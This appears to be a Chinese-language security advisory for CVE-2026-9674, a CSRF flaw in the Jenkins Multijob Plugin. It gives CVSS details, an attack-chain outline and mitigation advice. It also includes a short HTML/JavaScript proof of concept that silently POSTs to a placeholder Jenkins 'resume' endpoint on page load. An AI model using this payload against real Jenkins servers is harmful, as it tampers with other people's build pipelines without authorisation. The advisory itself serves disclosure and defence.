IPBUF安全漏洞报告
English
CVE-2026-9674 CVSS 4.3 中危

CVE-2026-9674 Jenkins Multijob Plugin CSRF漏洞

披露日期: 2026-05-27

漏洞信息

漏洞编号
CVE-2026-9674
漏洞类型
CSRF (跨站请求伪造)
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Jenkins Multijob Plugin

相关标签

CSRFJenkinsMultijob PluginWeb漏洞中危CWE-352

漏洞概述

Jenkins Multijob Plugin在版本662.vd2e0001f6b_b_d及之前存在跨站请求伪造(CSRF)漏洞。该漏洞源于插件恢复Multijob构建的接口缺乏必要的CSRF令牌验证。攻击者可利用此漏洞构造恶意页面,诱导已登录的管理员访问,从而在未经授权的情况下恢复失败的构建任务,对系统完整性造成威胁。

技术细节

该漏洞属于典型的跨站请求伪造(CSRF)缺陷。Jenkins Multijob Plugin在处理“恢复失败构建”的请求时,未充分验证请求来源或缺少必要的CSRF令牌(如crumb)校验机制。攻击者可构造恶意的HTML页面,其中包含针对恢复构建接口的HTTP请求,并诱导具有构建操作权限的已认证用户访问该页面。由于浏览器会自动携带用户的Session Cookie,Jenkins服务器会误认为该请求是用户主动发起的合法操作,从而执行恢复构建的命令。虽然攻击者无法直接获取敏感信息,但可干扰CI/CD流程,导致系统完整性受损。

攻击链分析

STEP 1
1. 侦察
攻击者识别出目标Jenkins实例使用了存在漏洞的Jenkins Multijob Plugin版本,并确定存在失败的Multijob构建任务。
STEP 2
2. 武器化
攻击者构造包含恶意HTTP请求的HTML页面,该请求指向恢复失败Multijob构建的API端点。
STEP 3
3. 投递
攻击者通过钓鱼邮件或即时通讯工具,诱导拥有Jenkins构建权限的已登录用户点击访问该恶意链接。
STEP 4
4. 利用
当受害者访问页面时,浏览器自动携带受害者的Jenkins Session Cookie发送恢复构建请求,服务器执行操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for CVE-2026-9674: CSRF to resume failed Multijob build --> <!-- Attacker needs to host this file and send the link to a victim with Jenkins session --> <html> <body> <h1>Loading...</h1> <script> // Replace with actual Jenkins job URL and build number var targetUrl = "http://target-jenkins.com/job/Multijob-Test/1/resume"; function csrfRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", targetUrl, true); // Send any required parameters if necessary, usually cookies are sent automatically by browser xhr.send(); } // Execute automatically on page load csrfRequest(); </script> </body> </html>

影响范围

Jenkins Multijob Plugin <= 662.vd2e0001f6b_b_d

防御指南

临时缓解措施
如果无法立即升级插件,建议暂时禁用Multijob插件以阻断攻击面。同时,管理员应警惕来源不明的邮件链接,避免在未退出Jenkins会话的情况下访问外部网站。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表